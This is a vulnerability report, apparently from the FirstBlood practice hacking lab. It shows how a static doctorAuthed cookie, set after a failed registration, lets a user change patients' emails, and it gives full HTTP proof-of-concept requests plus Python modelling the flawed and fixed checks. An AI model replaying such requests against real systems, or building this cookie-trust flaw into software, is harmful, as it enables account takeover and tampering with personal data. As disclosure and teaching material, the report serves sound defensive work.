FirstBlood-#65 — DoctorAuthed cookie given at /register.php can be used to modify patient email at Appointment Form /manageappointment.php
This issue was discovered on FirstBlood v1
On 2021-05-09, 0xconft Level 5 reported:
Hi there,
When I tested registering as a doctor at the /register.php endpoint with invalid data, my cookie was set to "doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9", and I can use this cookie to modify a patient's email at the Appointment Form /manageappointment.php.
This bug can be chained with my previous report "aptid enumeration via http://firstbloodhackers.com:49276/api/qa.php can be used to leak Appointment data"
PoC of getting the doctorAuthed cookie
Request
POST /register.php HTTP/1.1
Host: firstbloodhackers.com:49280
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Origin: http://firstbloodhackers.com:49280
Connection: close
Referer: http://firstbloodhackers.com:49280/register.php
Upgrade-Insecure-Requests: 1
action=register&username=duh&inviteCode=1111111
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 09 May 2021 18:58:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Set-Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9; expires=Sun, 09-May-2021 19:58:55 GMT; Max-Age=3600; path=/
Content-Length: 11014
-snip-
PoC of changing Sean Zseano's email address
Request
POST /api/ma.php HTTP/1.1
Host: firstbloodhackers.com:49280
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-SITE-REQ: permitted
csrf: 99215d4e-0ff3-4275
Content-Length: 136
Origin: http://firstbloodhackers.com:49280
Connection: close
Referer: http://firstbloodhackers.com:49280/manageappointment.php?success&aptid=15a49a94-8db6-4f64-875c-4de449d755ed
Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9
message=Advised to rebook appointment as I missed my previous one&id=15a49a94-8db6-4f64-875c-4de449d755ed&[email protected]
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 09 May 2021 18:52:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 7
success
And zseano's email will be changed to [email protected] (screenshot attached)
Best Regards,
0xconft
P2 High
Endpoint: /manageappointment.php
Parameter: email
Payload: [email protected]
FirstBlood ID: 7
Vulnerability Type: Application/Business Logic
The endpoint /api/ma.php (used to modify an appointment) is only supposed to allow certain values to be modified. However, due to an application logic error, if a user has attempted to sign up as a doctor at /register.php (even with an invalid invite code, as in the PoC above) and therefore has the "doctorAuthed" cookie set, the endpoint also lets them change the email address of any appointment whose ID they know. The cookie is a static, unsigned base64 value (it decodes to {"doctorAuth":authed}), so its mere presence is what the server trusts; nothing binds it to a real doctor account.
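The logic flaw is easiest to see with the check written out. The following is an added example, not FirstBlood's actual source: it models the flawed /api/ma.php authorisation (editable fields chosen by the presence of a client-supplied cookie) next to a hardened variant that reads the doctor role from a server-side session and rejects fields the caller is not allowed to write. The Appointment dataclass, the sample patient record, the session dict and the return strings are all assumptions for illustration; only the cookie value and the aptid come from the report.

```python
import base64
from dataclasses import dataclass


# Cookie value from the report. Decoding shows a static, unsigned base64 blob:
# any client can present it without ever completing doctor registration.
DOCTOR_AUTHED_COOKIE = "eyJkb2N0b3JBdXRoIjphdXRoZWR9"


def decode_doctor_cookie(value: str) -> str:
    """Base64-decode the doctorAuthed cookie, restoring padding if it was stripped."""
    padded = value + "=" * (-len(value) % 4)
    return base64.b64decode(padded).decode()


@dataclass
class Appointment:
    """Hypothetical appointment record (assumed data model, not FirstBlood's schema)."""
    aptid: str
    email: str
    message: str = ""


def sample_appointments() -> dict:
    """Constructed sample data: the aptid is the one from the report, the patient is made up."""
    aptid = "15a49a94-8db6-4f64-875c-4de449d755ed"
    return {aptid: Appointment(aptid=aptid, email="patient@example.com")}


def vulnerable_ma(form: dict, cookies: dict, db: dict) -> str:
    """Model of the flawed check: the set of editable fields depends on a client cookie."""
    apt = db.get(form.get("id"))
    if apt is None:
        return "invalid"
    allowed = {"message"}
    if "doctorAuthed" in cookies:  # trusts the cookie's mere presence -> privilege escalation
        allowed.add("email")
    for name in allowed.intersection(form):
        setattr(apt, name, form[name])
    return "success"


def fixed_ma(form: dict, cookies: dict, db: dict, session: dict) -> str:
    """Hardened model: role comes from the server-side session only, the cookie is ignored,
    and a request carrying a field the caller may not write is refused outright."""
    del cookies  # deliberately unused: client-supplied state never decides authorisation
    apt = db.get(form.get("id"))
    if apt is None:
        return "invalid"
    allowed = {"message"}
    if session.get("role") == "doctor":  # set server-side at login, never from a cookie
        allowed.add("email")
    if set(form) - allowed - {"id"}:
        return "forbidden"  # fail closed instead of silently dropping the field
    for name in allowed.intersection(form):
        setattr(apt, name, form[name])
    return "success"


if __name__ == "__main__":
    print("cookie decodes to:", decode_doctor_cookie(DOCTOR_AUTHED_COOKIE))
    aptid = "15a49a94-8db6-4f64-875c-4de449d755ed"
    form = {"id": aptid, "message": "rebook", "email": "attacker@example.com"}
    db = sample_appointments()
    print("vulnerable, cookie present:", vulnerable_ma(form, {"doctorAuthed": DOCTOR_AUTHED_COOKIE}, db), db[aptid].email)
    db = sample_appointments()
    print("fixed, cookie present, no session:", fixed_ma(form, {"doctorAuthed": DOCTOR_AUTHED_COOKIE}, db, {}), db[aptid].email)
```

The fixed variant also refuses the whole request when a disallowed field is submitted rather than quietly ignoring it; that makes the field-level access control visible in logs and stops an attacker from probing which fields are silently accepted.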